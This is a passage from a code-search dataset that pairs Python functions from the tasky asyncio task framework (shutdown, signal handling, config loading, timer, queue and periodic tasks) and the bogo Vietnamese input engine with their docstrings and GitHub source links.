Log.debug('task %s already stopped', task.name)
self.running_tasks.discard(task)
else:
Log.debug('asking %s to stop', task.name)
asyncio.ensure_future(task.stop(force=force))
# While anything is still alive and there is budget left, re-schedule
# this same method `step` seconds from now with a reduced `timeout` --
# a polling loop built out of call_later rather than await/sleep.
if timeout > 0 and (self.monitor or self.running_tasks):
Log.debug('waiting %.1f seconds for remaining tasks (%d)...',
timeout, len(self.running_tasks))
timeout -= step
fn = functools.partial(self.terminate, force=force,
timeout=timeout, step=step)
return self.loop.call_later(step, fn)
# Either everything finished (timeout still positive) or patience ran
# out; in both cases the event loop is stopped now.
if timeout > 0:
Log.debug('all tasks completed, stopping event loop')
else:
Log.debug('timed out waiting for tasks, stopping event loop')
self.loop.stop()
async def start_task(self, task: Task) -> None:
'''Initialize the task, queue it for execution, add the done callback,
and keep track of it for when tasks need to be stopped.'''
try:
Log.debug('task %s starting', task.name)
# Wall-clock start time, recorded both locally and in the task's
# counters before the task body runs.
before = time.time()
task.counters['last_run'] = before
task.running = True
self.running_tasks.add(task)
await task.run_task()
Log.debug('task %s completed', task.name)
except CancelledError:
Log.debug('task %s cancelled', task.name)
except Exception:
# Last-resort guard: a task's own exception must not propagate out
# of this wrapper coroutine.
Log.exception('unhandled exception in task %s', task.name)
finally:
# Always de-register and reset bookkeeping, whether the task
# finished, was cancelled, or crashed.
self.running_tasks.discard(task)
task.running = False
task.task = None
after = time.time()
total = after - before
task.counters['last_completed'] = after
task.counters['duration'] = total
async def monitor_tasks(self, interval: float=1.0) -> None:
'''Monitor all known tasks for run state. Ensure that enabled tasks
are running, and that disabled tasks are stopped.'''
Log.debug('monitor running')
while True:
try:
# Poll once every `interval` seconds.
await asyncio.sleep(interval)
for name, task in self.all_tasks.items():
if self.terminate_on_finish:
# Shutdown mode (run_until_complete): actively stop
# whatever is still running, restart nothing.
if task in self.running_tasks and task.running:
await task.stop()
elif task.enabled:
# Enabled but not currently running: restart it.
if task not in self.running_tasks:
Log.debug('task %s enabled, restarting', task.name)
await self.insert(task)
else:
# Disabled but still running: stop it.
if task in self.running_tasks:
Log.debug('task %s disabled, stopping', task.name)
await task.stop()
if self.terminate_on_finish and not self.running_tasks:
Log.debug('all tasks completed, terminating')
break
except CancelledError:
Log.debug('monitor cancelled')
break
except Exception:
# Keep monitoring even if one pass fails.
Log.exception('monitoring exception')
# The loop exits only on cancellation or when every task finished in
# shutdown mode; either way, schedule a full terminate() next tick.
self.monitor = None
self.loop.call_later(0, self.terminate)
def sigint(self) -> None:
    '''Ctrl-C handler that escalates with each press: first a graceful
    stop, then forced task cancellation, finally halting the loop.'''
    attempt = self.stop_attempts
    if attempt >= 2:
        # Third (or later) press: give up on the tasks entirely.
        Log.info('forcefully stopping event loop')
        self.loop.stop()
        return
    if attempt == 0:
        Log.info('gracefully stopping tasks')
        self.stop_attempts = attempt + 1
        self.terminate()
    else:
        Log.info('forcefully cancelling tasks')
        self.stop_attempts = attempt + 1
        self.terminate(force=True)
def sigterm(self) -> None:
    '''SIGTERM handler: trigger one graceful shutdown; repeated signals
    are acknowledged but otherwise ignored while tasks wind down.'''
    already_stopping = self.stop_attempts >= 1
    if already_stopping:
        Log.info('received SIGTERM, bravely waiting for tasks')
        return
    Log.info('received SIGTERM, gracefully stopping tasks')
    self.stop_attempts += 1
    self.terminate()
|
jreese/tasky | tasky/loop.py | Tasky.sigint | python | def sigint(self) -> None:
'''Handle the user pressing Ctrl-C by stopping tasks nicely at first,
then forcibly upon further presses.'''
if self.stop_attempts < 1:
Log.info('gracefully stopping tasks')
self.stop_attempts += 1
self.terminate()
elif self.stop_attempts < 2:
Log.info('forcefully cancelling tasks')
self.stop_attempts += 1
self.terminate(force=True)
else:
Log.info('forcefully stopping event loop')
self.loop.stop() | Handle the user pressing Ctrl-C by stopping tasks nicely at first,
then forcibly upon further presses. | train | https://github.com/jreese/tasky/blob/681f4e5a9a60a0eb838b89f320309cfb45a56242/tasky/loop.py#L286-L302 | [
"def terminate(self, *, force: bool=False, timeout: float=30.0,\n step: float=1.0) -> None:\n '''Stop all scheduled and/or executing tasks, first by asking nicely,\n and then by waiting up to `timeout` seconds before forcefully stopping\n the asyncio event loop.'''\n\n if isinstance(self.mo... | class Tasky(object):
'''Task management framework for asyncio'''
def __init__(self,
task_list: List[Task]=None,
config: Config=Config,
stats: Stats=Stats,
executor: Executor=None,
debug: bool=False) -> None:
'''Initialize Tasky and automatically start a list of tasks.
One of the following methods must be called on the resulting objects
to start the event loop: `run_forever()`, `run_until_complete()`, or
`run_for_time()`.'''
if uvloop:
Log.debug('using uvloop event loop')
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
self.loop = asyncio.new_event_loop()
self.loop.add_signal_handler(signal.SIGINT, self.sigint)
self.loop.add_signal_handler(signal.SIGTERM, self.sigterm)
self.loop.set_exception_handler(self.exception)
asyncio.set_event_loop(self.loop)
if debug:
Log.debug('enabling asyncio debug mode')
self.loop.set_debug(True)
self.all_tasks = {}
self.running_tasks = set()
self.initial_tasks = list(task_list)
self.configuration = config
self.stats = stats
self.executor = executor
self.monitor = False
self.terminate_on_finish = False
self.stop_attempts = 0
@property
def config(self) -> Any:
'''Return configuration data for the root service.'''
return self.configuration.global_config()
@property
def counters(self) -> DictWrapper:
'''Dict-like structure for tracking global stats.'''
return self.stats.global_counter()
def task(self, name_or_class: Any) -> Task:
'''Return a running Task object matching the given name or class.'''
if name_or_class in self.all_tasks:
return self.all_tasks[name_or_class]
try:
return self.all_tasks.get(name_or_class.__class__.__name__, None)
except AttributeError:
return None
async def init(self) -> None:
'''Initialize configuration and start tasks.'''
self.stats = await self.insert(self.stats)
self.configuration = await self.insert(self.configuration)
if not self.executor:
try:
max_workers = self.config.get('executor_workers')
except Exception:
max_workers = None
self.executor = ThreadPoolExecutor(max_workers=max_workers)
for task in self.initial_tasks:
await self.insert(task)
self.monitor = asyncio.ensure_future(self.monitor_tasks())
self.counters['alive_since'] = time.time()
async def insert(self, task: Task) -> None:
'''Insert the given task class into the Tasky event loop.'''
if not isinstance(task, Task):
task = task()
if task.name not in self.all_tasks:
task.tasky = self
self.all_tasks[task.name] = task
await task.init()
elif task != self.all_tasks[task.name]:
raise Exception('Duplicate task %s' % task.name)
if task.enabled:
task.task = asyncio.ensure_future(self.start_task(task))
self.running_tasks.add(task)
else:
task.task = None
return task
async def execute(self, fn, *args, **kwargs) -> None:
'''Execute an arbitrary function outside the event loop using
a shared Executor.'''
fn = functools.partial(fn, *args, **kwargs)
return await self.loop.run_in_executor(self.executor, fn)
def run_forever(self) -> None:
'''Execute the tasky/asyncio event loop until terminated.'''
Log.debug('running event loop until terminated')
asyncio.ensure_future(self.init())
self.loop.run_forever()
self.loop.close()
def run_until_complete(self) -> None:
'''Execute the tasky/asyncio event loop until all tasks finish.'''
Log.debug('running event loop until all tasks completed')
self.terminate_on_finish = True
asyncio.ensure_future(self.init())
self.loop.run_forever()
self.loop.close()
def run_for_time(self, duration: float=10.0) -> None:
'''Execute the tasky/asyncio event loop for `duration` seconds.'''
Log.debug('running event loop for %.1f seconds', duration)
try:
asyncio.ensure_future(self.init())
self.loop.run_until_complete(asyncio.sleep(duration))
self.terminate()
self.loop.run_forever()
except RuntimeError as e:
if not e.args[0].startswith('Event loop stopped'):
raise
finally:
self.loop.close()
def terminate(self, *, force: bool=False, timeout: float=30.0,
step: float=1.0) -> None:
'''Stop all scheduled and/or executing tasks, first by asking nicely,
and then by waiting up to `timeout` seconds before forcefully stopping
the asyncio event loop.'''
if isinstance(self.monitor, asyncio.Future):
Log.debug('cancelling task monitor')
self.monitor.cancel()
Log.debug('stopping tasks')
for task in list(self.running_tasks):
if task.task.done():
Log.debug('task %s already stopped', task.name)
self.running_tasks.discard(task)
else:
Log.debug('asking %s to stop', task.name)
asyncio.ensure_future(task.stop(force=force))
if timeout > 0 and (self.monitor or self.running_tasks):
Log.debug('waiting %.1f seconds for remaining tasks (%d)...',
timeout, len(self.running_tasks))
timeout -= step
fn = functools.partial(self.terminate, force=force,
timeout=timeout, step=step)
return self.loop.call_later(step, fn)
if timeout > 0:
Log.debug('all tasks completed, stopping event loop')
else:
Log.debug('timed out waiting for tasks, stopping event loop')
self.loop.stop()
async def start_task(self, task: Task) -> None:
'''Initialize the task, queue it for execution, add the done callback,
and keep track of it for when tasks need to be stopped.'''
try:
Log.debug('task %s starting', task.name)
before = time.time()
task.counters['last_run'] = before
task.running = True
self.running_tasks.add(task)
await task.run_task()
Log.debug('task %s completed', task.name)
except CancelledError:
Log.debug('task %s cancelled', task.name)
except Exception:
Log.exception('unhandled exception in task %s', task.name)
finally:
self.running_tasks.discard(task)
task.running = False
task.task = None
after = time.time()
total = after - before
task.counters['last_completed'] = after
task.counters['duration'] = total
async def monitor_tasks(self, interval: float=1.0) -> None:
'''Monitor all known tasks for run state. Ensure that enabled tasks
are running, and that disabled tasks are stopped.'''
Log.debug('monitor running')
while True:
try:
await asyncio.sleep(interval)
for name, task in self.all_tasks.items():
if self.terminate_on_finish:
if task in self.running_tasks and task.running:
await task.stop()
elif task.enabled:
if task not in self.running_tasks:
Log.debug('task %s enabled, restarting', task.name)
await self.insert(task)
else:
if task in self.running_tasks:
Log.debug('task %s disabled, stopping', task.name)
await task.stop()
if self.terminate_on_finish and not self.running_tasks:
Log.debug('all tasks completed, terminating')
break
except CancelledError:
Log.debug('monitor cancelled')
break
except Exception:
Log.exception('monitoring exception')
self.monitor = None
self.loop.call_later(0, self.terminate)
def exception(self, loop: asyncio.BaseEventLoop, context: dict) -> None:
'''Log unhandled exceptions from anywhere in the event loop.'''
Log.error('unhandled exception: %s', context['message'])
Log.error('%s', context)
if 'exception' in context:
Log.error(' %s', context['exception'])
def sigterm(self) -> None:
'''Handle SIGTERM from the system by stopping tasks gracefully.
Repeated signals will be ignored while waiting for tasks to finish.'''
if self.stop_attempts < 1:
Log.info('received SIGTERM, gracefully stopping tasks')
self.stop_attempts += 1
self.terminate()
else:
Log.info('received SIGTERM, bravely waiting for tasks')
|
jreese/tasky | tasky/loop.py | Tasky.sigterm | python | def sigterm(self) -> None:
'''Handle SIGTERM from the system by stopping tasks gracefully.
Repeated signals will be ignored while waiting for tasks to finish.'''
if self.stop_attempts < 1:
Log.info('received SIGTERM, gracefully stopping tasks')
self.stop_attempts += 1
self.terminate()
else:
Log.info('received SIGTERM, bravely waiting for tasks') | Handle SIGTERM from the system by stopping tasks gracefully.
Repeated signals will be ignored while waiting for tasks to finish. | train | https://github.com/jreese/tasky/blob/681f4e5a9a60a0eb838b89f320309cfb45a56242/tasky/loop.py#L304-L314 | [
"def terminate(self, *, force: bool=False, timeout: float=30.0,\n step: float=1.0) -> None:\n '''Stop all scheduled and/or executing tasks, first by asking nicely,\n and then by waiting up to `timeout` seconds before forcefully stopping\n the asyncio event loop.'''\n\n if isinstance(self.mo... | class Tasky(object):
'''Task management framework for asyncio'''
def __init__(self,
task_list: List[Task]=None,
config: Config=Config,
stats: Stats=Stats,
executor: Executor=None,
debug: bool=False) -> None:
'''Initialize Tasky and automatically start a list of tasks.
One of the following methods must be called on the resulting objects
to start the event loop: `run_forever()`, `run_until_complete()`, or
`run_for_time()`.'''
if uvloop:
Log.debug('using uvloop event loop')
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
self.loop = asyncio.new_event_loop()
self.loop.add_signal_handler(signal.SIGINT, self.sigint)
self.loop.add_signal_handler(signal.SIGTERM, self.sigterm)
self.loop.set_exception_handler(self.exception)
asyncio.set_event_loop(self.loop)
if debug:
Log.debug('enabling asyncio debug mode')
self.loop.set_debug(True)
self.all_tasks = {}
self.running_tasks = set()
self.initial_tasks = list(task_list)
self.configuration = config
self.stats = stats
self.executor = executor
self.monitor = False
self.terminate_on_finish = False
self.stop_attempts = 0
@property
def config(self) -> Any:
'''Return configuration data for the root service.'''
return self.configuration.global_config()
@property
def counters(self) -> DictWrapper:
'''Dict-like structure for tracking global stats.'''
return self.stats.global_counter()
def task(self, name_or_class: Any) -> Task:
'''Return a running Task object matching the given name or class.'''
if name_or_class in self.all_tasks:
return self.all_tasks[name_or_class]
try:
return self.all_tasks.get(name_or_class.__class__.__name__, None)
except AttributeError:
return None
async def init(self) -> None:
'''Initialize configuration and start tasks.'''
self.stats = await self.insert(self.stats)
self.configuration = await self.insert(self.configuration)
if not self.executor:
try:
max_workers = self.config.get('executor_workers')
except Exception:
max_workers = None
self.executor = ThreadPoolExecutor(max_workers=max_workers)
for task in self.initial_tasks:
await self.insert(task)
self.monitor = asyncio.ensure_future(self.monitor_tasks())
self.counters['alive_since'] = time.time()
async def insert(self, task: Task) -> None:
'''Insert the given task class into the Tasky event loop.'''
if not isinstance(task, Task):
task = task()
if task.name not in self.all_tasks:
task.tasky = self
self.all_tasks[task.name] = task
await task.init()
elif task != self.all_tasks[task.name]:
raise Exception('Duplicate task %s' % task.name)
if task.enabled:
task.task = asyncio.ensure_future(self.start_task(task))
self.running_tasks.add(task)
else:
task.task = None
return task
async def execute(self, fn, *args, **kwargs) -> None:
'''Execute an arbitrary function outside the event loop using
a shared Executor.'''
fn = functools.partial(fn, *args, **kwargs)
return await self.loop.run_in_executor(self.executor, fn)
def run_forever(self) -> None:
'''Execute the tasky/asyncio event loop until terminated.'''
Log.debug('running event loop until terminated')
asyncio.ensure_future(self.init())
self.loop.run_forever()
self.loop.close()
def run_until_complete(self) -> None:
'''Execute the tasky/asyncio event loop until all tasks finish.'''
Log.debug('running event loop until all tasks completed')
self.terminate_on_finish = True
asyncio.ensure_future(self.init())
self.loop.run_forever()
self.loop.close()
def run_for_time(self, duration: float=10.0) -> None:
'''Execute the tasky/asyncio event loop for `duration` seconds.'''
Log.debug('running event loop for %.1f seconds', duration)
try:
asyncio.ensure_future(self.init())
self.loop.run_until_complete(asyncio.sleep(duration))
self.terminate()
self.loop.run_forever()
except RuntimeError as e:
if not e.args[0].startswith('Event loop stopped'):
raise
finally:
self.loop.close()
def terminate(self, *, force: bool=False, timeout: float=30.0,
step: float=1.0) -> None:
'''Stop all scheduled and/or executing tasks, first by asking nicely,
and then by waiting up to `timeout` seconds before forcefully stopping
the asyncio event loop.'''
if isinstance(self.monitor, asyncio.Future):
Log.debug('cancelling task monitor')
self.monitor.cancel()
Log.debug('stopping tasks')
for task in list(self.running_tasks):
if task.task.done():
Log.debug('task %s already stopped', task.name)
self.running_tasks.discard(task)
else:
Log.debug('asking %s to stop', task.name)
asyncio.ensure_future(task.stop(force=force))
if timeout > 0 and (self.monitor or self.running_tasks):
Log.debug('waiting %.1f seconds for remaining tasks (%d)...',
timeout, len(self.running_tasks))
timeout -= step
fn = functools.partial(self.terminate, force=force,
timeout=timeout, step=step)
return self.loop.call_later(step, fn)
if timeout > 0:
Log.debug('all tasks completed, stopping event loop')
else:
Log.debug('timed out waiting for tasks, stopping event loop')
self.loop.stop()
async def start_task(self, task: Task) -> None:
'''Initialize the task, queue it for execution, add the done callback,
and keep track of it for when tasks need to be stopped.'''
try:
Log.debug('task %s starting', task.name)
before = time.time()
task.counters['last_run'] = before
task.running = True
self.running_tasks.add(task)
await task.run_task()
Log.debug('task %s completed', task.name)
except CancelledError:
Log.debug('task %s cancelled', task.name)
except Exception:
Log.exception('unhandled exception in task %s', task.name)
finally:
self.running_tasks.discard(task)
task.running = False
task.task = None
after = time.time()
total = after - before
task.counters['last_completed'] = after
task.counters['duration'] = total
async def monitor_tasks(self, interval: float=1.0) -> None:
'''Monitor all known tasks for run state. Ensure that enabled tasks
are running, and that disabled tasks are stopped.'''
Log.debug('monitor running')
while True:
try:
await asyncio.sleep(interval)
for name, task in self.all_tasks.items():
if self.terminate_on_finish:
if task in self.running_tasks and task.running:
await task.stop()
elif task.enabled:
if task not in self.running_tasks:
Log.debug('task %s enabled, restarting', task.name)
await self.insert(task)
else:
if task in self.running_tasks:
Log.debug('task %s disabled, stopping', task.name)
await task.stop()
if self.terminate_on_finish and not self.running_tasks:
Log.debug('all tasks completed, terminating')
break
except CancelledError:
Log.debug('monitor cancelled')
break
except Exception:
Log.exception('monitoring exception')
self.monitor = None
self.loop.call_later(0, self.terminate)
def exception(self, loop: asyncio.BaseEventLoop, context: dict) -> None:
    '''asyncio exception handler: record any unhandled error that
    surfaces on the event loop.'''
    error = Log.error
    error('unhandled exception: %s', context['message'])
    error('%s', context)
    if 'exception' in context:
        error(' %s', context['exception'])
def sigint(self) -> None:
'''Handle the user pressing Ctrl-C by stopping tasks nicely at first,
then forcibly upon further presses.'''
if self.stop_attempts < 1:
Log.info('gracefully stopping tasks')
self.stop_attempts += 1
self.terminate()
elif self.stop_attempts < 2:
Log.info('forcefully cancelling tasks')
self.stop_attempts += 1
self.terminate(force=True)
else:
Log.info('forcefully stopping event loop')
self.loop.stop()
|
jreese/tasky | tasky/config.py | Config.get | python | def get(self, key: Any, default: Any=None) -> Any:
'''Return the configured value for the given key name, or `default` if
no value is available or key is invalid.'''
return self.data.get(key, default) | Return the configured value for the given key name, or `default` if
no value is available or key is invalid. | train | https://github.com/jreese/tasky/blob/681f4e5a9a60a0eb838b89f320309cfb45a56242/tasky/config.py#L28-L32 | null | class Config(Task):
'''Mechanism for providing read-only configuration values to a service,
as well as individual tasks in that service, from either a local source
or an external configuration service. Base implementation simply stores
a static dictionary, and emulates a read-only container interface.'''
def __init__(self, data: dict=None) -> None:
    '''Wrap a static dict of configuration values; any falsy argument
    (None, empty dict) is normalized to a fresh empty dict.'''
    super().__init__()
    self.data = data or {}
def global_config(self) -> Any:
    '''Expose the service-wide configuration mapping held by this task.'''
    config_data = self.data
    return config_data
def task_config(self, task: Task) -> Any:
    '''Look up the configuration section named after the task's class.'''
    section = task.__class__.__name__
    return self.get(section)
async def init(self) -> None:
'''Gather initial configuration data from the backing.'''
pass
async def run(self) -> None:
'''Potentially run any amount of one-shot or ongoing async code
necessary to maintain configuration data.'''
pass
def __repr__(self):
    '''Human-readable form: the task name plus its configuration data.'''
    template = '{}(data={})'
    return template.format(self.name, self.data)
|
jreese/tasky | tasky/config.py | Config.task_config | python | def task_config(self, task: Task) -> Any:
'''Return the task-specific configuration.'''
return self.get(task.__class__.__name__) | Return the task-specific configuration. | train | https://github.com/jreese/tasky/blob/681f4e5a9a60a0eb838b89f320309cfb45a56242/tasky/config.py#L39-L42 | [
"def get(self, key: Any, default: Any=None) -> Any:\n '''Return the configured value for the given key name, or `default` if\n no value is available or key is invalid.'''\n\n return self.data.get(key, default)\n"
] | class Config(Task):
'''Mechanism for providing read-only configuration values to a service,
as well as individual tasks in that service, from either a local source
or an external configuration service. Base implementation simply stores
a static dictionary, and emulates a read-only container interface.'''
def __init__(self, data: dict=None) -> None:
super().__init__()
if not data:
data = {}
self.data = data
def get(self, key: Any, default: Any=None) -> Any:
'''Return the configured value for the given key name, or `default` if
no value is available or key is invalid.'''
return self.data.get(key, default)
def global_config(self) -> Any:
'''Return the global service configuration.'''
return self.data
async def init(self) -> None:
'''Gather initial configuration data from the backing.'''
pass
async def run(self) -> None:
'''Potentially run any amount of one-shot or ongoing async code
necessary to maintain configuration data.'''
pass
def __repr__(self):
return '{}(data={})'.format(self.name, self.data)
|
jreese/tasky | tasky/config.py | JsonConfig.init | python | async def init(self) -> None:
'''Load configuration in JSON format from either a file or
a raw data string.'''
if self.data:
return
if self.json_data:
try:
self.data = json.loads(self.json_data)
except Exception:
Log.exception('Falied to load raw configuration')
else:
try:
with open(self.json_path, 'r') as f:
self.data = json.load(f)
except Exception:
Log.exception('Failed to load configuration from %s',
self.json_path)
self.data = {} | Load configuration in JSON format from either a file or
a raw data string. | train | https://github.com/jreese/tasky/blob/681f4e5a9a60a0eb838b89f320309cfb45a56242/tasky/config.py#L72-L94 | null | class JsonConfig(Config):
'''Provide configuration from a local JSON file.'''
def __init__(self, json_path: str=None, json_data: str=None) -> None:
'''Store the JSON source (a file path or a raw JSON string) for later
parsing; `data` stays None so the `enabled` property reports True
until the configuration has actually been loaded.'''
# NOTE(review): unlike Config.__init__, this does not call
# super().__init__() -- presumably intentional, but worth confirming
# against the base Task initializer.
self.json_path = json_path
self.json_data = json_data
self.data = None
@property
def enabled(self) -> bool:
    '''True while the configuration has not been loaded yet; False once
    `data` has been populated.'''
    loaded = self.data is not None
    return not loaded
|
jreese/tasky | tasky/tasks/timer.py | TimerTask.run_task | python | async def run_task(self) -> None:
'''Execute the task inside the asyncio event loop after `DELAY`
seconds. Track the time it takes to run, and log when it starts/stops.
If/when `reset()` is called, reset the wait time to `DELAY` seconds.'''
self.last_run = 0.0
self.target = self.time() + self.DELAY
while self.running:
try:
now = self.time()
if now < self.target:
sleep = self.target - now
await self.sleep(sleep)
elif self.last_run < self.target:
Log.debug('executing timer task %s', self.name)
self.last_run = self.time()
await self.run()
total = self.time() - self.last_run
Log.debug('finished timer task %s in %.1f seconds',
self.name, total)
else:
sleep = min(5.0, self.DELAY)
await self.sleep(sleep)
except CancelledError:
Log.debug('cancelled timer task %s', self.name)
raise
except Exception:
Log.exception('exception in timer task %s', self.name) | Execute the task inside the asyncio event loop after `DELAY`
seconds. Track the time it takes to run, and log when it starts/stops.
If/when `reset()` is called, reset the wait time to `DELAY` seconds. | train | https://github.com/jreese/tasky/blob/681f4e5a9a60a0eb838b89f320309cfb45a56242/tasky/tasks/timer.py#L20-L53 | [
"async def run(self) -> None:\n '''Override this method to define what happens when your task runs.'''\n\n pass\n",
"async def sleep(self, duration: float=0.0) -> None:\n '''Simple wrapper around `asyncio.sleep()`.'''\n duration = max(0, duration)\n\n if duration > 0:\n Log.debug('sleeping t... | class TimerTask(Task):
'''Run a method on the asyncio event loop exactly once after `DELAY`
seconds. Calling the `reset()` method will postpone execution, or re-queue
execution if the timer has already completed.'''
DELAY = 60.0
def reset(self) -> None:
'''Reset task execution to `DELAY` seconds from now.'''
Log.debug('resetting timer task %s')
self.target = self.time() + self.DELAY
|
jreese/tasky | tasky/tasks/timer.py | TimerTask.reset | python | def reset(self) -> None:
'''Reset task execution to `DELAY` seconds from now.'''
Log.debug('resetting timer task %s')
self.target = self.time() + self.DELAY | Reset task execution to `DELAY` seconds from now. | train | https://github.com/jreese/tasky/blob/681f4e5a9a60a0eb838b89f320309cfb45a56242/tasky/tasks/timer.py#L55-L59 | [
"def time(self) -> float:\n '''Return the current time on the asyncio event loop.'''\n\n return self.tasky.loop.time()\n"
] | class TimerTask(Task):
'''Run a method on the asyncio event loop exactly once after `DELAY`
seconds. Calling the `reset()` method will postpone execution, or re-queue
execution if the timer has already completed.'''
DELAY = 60.0
async def run_task(self) -> None:
'''Execute the task inside the asyncio event loop after `DELAY`
seconds. Track the time it takes to run, and log when it starts/stops.
If/when `reset()` is called, reset the wait time to `DELAY` seconds.'''
self.last_run = 0.0
self.target = self.time() + self.DELAY
while self.running:
try:
now = self.time()
if now < self.target:
sleep = self.target - now
await self.sleep(sleep)
elif self.last_run < self.target:
Log.debug('executing timer task %s', self.name)
self.last_run = self.time()
await self.run()
total = self.time() - self.last_run
Log.debug('finished timer task %s in %.1f seconds',
self.name, total)
else:
sleep = min(5.0, self.DELAY)
await self.sleep(sleep)
except CancelledError:
Log.debug('cancelled timer task %s', self.name)
raise
except Exception:
Log.exception('exception in timer task %s', self.name)
|
jreese/tasky | tasky/tasks/queue.py | QueueTask.run_task | python | async def run_task(self) -> None:
'''Initialize the queue and spawn extra worker tasks if this if the
first task. Then wait for work items to enter the task queue, and
execute the `run()` method with the current work item.'''
while self.running:
try:
item = self.QUEUE.get_nowait()
Log.debug('%s processing work item', self.name)
await self.run(item)
Log.debug('%s completed work item', self.name)
self.QUEUE.task_done()
except asyncio.QueueEmpty:
if self.OPEN:
await self.sleep(0.05)
else:
Log.debug('%s queue closed and empty, stopping', self.name)
return
except CancelledError:
Log.debug('%s cancelled, dropping work item')
self.QUEUE.task_done()
raise
except Exception:
Log.exception('%s failed work item', self.name)
self.QUEUE.task_done() | Initialize the queue and spawn extra worker tasks if this if the
first task. Then wait for work items to enter the task queue, and
execute the `run()` method with the current work item. | train | https://github.com/jreese/tasky/blob/681f4e5a9a60a0eb838b89f320309cfb45a56242/tasky/tasks/queue.py#L62-L92 | [
"async def run(self, item: Any) -> None:\n '''Override this method to define what happens when your task runs.'''\n\n await self.sleep(1.0)\n",
"async def sleep(self, duration: float=0.0) -> None:\n '''Simple wrapper around `asyncio.sleep()`.'''\n duration = max(0, duration)\n\n if duration > 0:\n ... | class QueueTask(Task):
'''Run a method on the asyncio event loop for each item inserted into this
task's work queue. Can use multiple "workers" to process the work queue.
Failed work items (those generating exceptions) will be dropped -- workers
must manually requeue any work items that need to be reprocessed.'''
WORKERS = 1
MAXSIZE = 0
QUEUE = None
OPEN = True
def __init__(self, id: int=0):
'''Initialize the shared work queue for all workers.'''
super().__init__()
if self.__class__.QUEUE is None:
self.__class__.QUEUE = asyncio.Queue(self.MAXSIZE)
self.id = max(0, id)
@property
def name(self):
return '{0}({1})'.format(self.__class__.__name__, self.id)
@classmethod
def close(cls):
'''Mark the queue as being "closed". Once closed, workers will stop
running once the work queue becomes empty.'''
Log.debug('closing %s work queue', cls.__name__)
cls.OPEN = False
async def init(self) -> None:
if self.id == 0:
Log.debug('initializing %s', self.name)
for task_id in range(1, self.WORKERS):
task = self.__class__(id=task_id)
Log.debug('spawning %s', task.name)
await self.tasky.insert(task)
async def run(self, item: Any) -> None:
'''Override this method to define what happens when your task runs.'''
await self.sleep(1.0)
|
jreese/tasky | tasky/tasks/periodic.py | PeriodicTask.run_task | python | async def run_task(self) -> None:
'''Execute the task inside the asyncio event loop. Track the time it
takes to run, and log when it starts/stops. After `INTERVAL` seconds,
if/once the task has finished running, run it again until `stop()`
is called.'''
while self.running:
try:
Log.debug('executing periodic task %s', self.name)
before = self.time()
await self.run()
total = self.time() - before
Log.debug('finished periodic task %s in %.1f seconds',
self.name, total)
sleep = self.INTERVAL - total
if sleep > 0:
await self.sleep(sleep)
except CancelledError:
Log.debug('cancelled periodic task %s', self.name)
raise
except Exception:
Log.exception('exception in periodic task %s', self.name) | Execute the task inside the asyncio event loop. Track the time it
takes to run, and log when it starts/stops. After `INTERVAL` seconds,
if/once the task has finished running, run it again until `stop()`
is called. | train | https://github.com/jreese/tasky/blob/681f4e5a9a60a0eb838b89f320309cfb45a56242/tasky/tasks/periodic.py#L18-L42 | [
"async def run(self) -> None:\n '''Override this method to define what happens when your task runs.'''\n\n pass\n",
"async def sleep(self, duration: float=0.0) -> None:\n '''Simple wrapper around `asyncio.sleep()`.'''\n duration = max(0, duration)\n\n if duration > 0:\n Log.debug('sleeping t... | class PeriodicTask(Task):
'''Run a method on the asyncio event loop every `INTERVAL` seconds.'''
INTERVAL = 60.0
|
BoGoEngine/bogo-python | bogo/utils.py | append_comps | python | def append_comps(comps, char):
c = list(comps)
if is_vowel(char):
if not c[2]: pos = 1
else: pos = 2
else:
if not c[2] and not c[1]: pos = 0
else: pos = 2
c[pos] += char
return c | Append a character to `comps` following this rule: a vowel is added to the
vowel part if there is no last consonant, else to the last consonant part;
a consonant is added to the first consonant part if there is no vowel, and
to the last consonant part if the vowel part is not empty.
>>> transform(['', '', ''])
['c', '', '']
>>> transform(['c', '', ''], '+o')
['c', 'o', '']
>>> transform(['c', 'o', ''], '+n')
['c', 'o', 'n']
>>> transform(['c', 'o', 'n'], '+o')
['c', 'o', 'no'] | train | https://github.com/BoGoEngine/bogo-python/blob/9b85329a408ded4cead3539cecba12984d5d7650/bogo/utils.py#L51-L75 | [
"def is_vowel(char):\n char = char.lower()\n return char in VOWELS\n"
] | # -*- coding: utf-8 -*-
#
# This file is part of ibus-bogo project.
#
# Copyright (C) 2012 Long T. Dam <longdt90@gmail.com>
# Copyright (C) 2012-2013 Trung Ngo <ndtrung4419@gmail.com>
# Copyright (C) 2013 Duong H. Nguyen <cmpitg@gmail.com>
#
# ibus-bogo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ibus-bogo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ibus-bogo. If not, see <http://www.gnu.org/licenses/>.
#
from __future__ import unicode_literals
VOWELS = "àáảãạaằắẳẵặăầấẩẫậâèéẻẽẹeềếểễệêìíỉĩịi" + \
"òóỏõọoồốổỗộôờớởỡợơùúủũụuừứửữựưỳýỷỹỵy"
def join(alist):
return "".join(alist)
def is_vowel(char):
char = char.lower()
return char in VOWELS
def change_case(string, case):
"""
Helper: Return new string obtained from change the given string to
desired case.
Args
string
case - 0: lower, 1: upper
"""
return string.upper() if case else string.lower()
# def gibberish_split(head, tail=""):
# """
# Try to split a string into two parts: the alphabetic part at the end and the
# rest.
# >>> gibberish_split("aoeu")
# ("", "aoeu")
# >>> gibberish_split("ao.eu")
# ("ao.", "eu")
# >>> gibberish_split("aoeu.")
# ("aoeu.", "")
# """
# if head == "" or not head[-1].isalpha():
# return (head, tail)
# else:
# return gibberish_split(head[:-1], head[-1] + tail)
def separate(string):
"""
Separate a string into smaller parts: first consonant (or head), vowel,
last consonant (if any).
>>> separate('tuong')
['t','uo','ng']
>>> separate('ohmyfkinggod')
['ohmyfkingg','o','d']
"""
def atomic_separate(string, last_chars, last_is_vowel):
if string == "" or (last_is_vowel != is_vowel(string[-1])):
return (string, last_chars)
else:
return atomic_separate(string[:-1],
string[-1] + last_chars, last_is_vowel)
head, last_consonant = atomic_separate(string, "", False)
first_consonant, vowel = atomic_separate(head, "", True)
if last_consonant and not (vowel + first_consonant):
comps = [last_consonant, '', ''] # ['', '', b] -> ['b', '', '']
else:
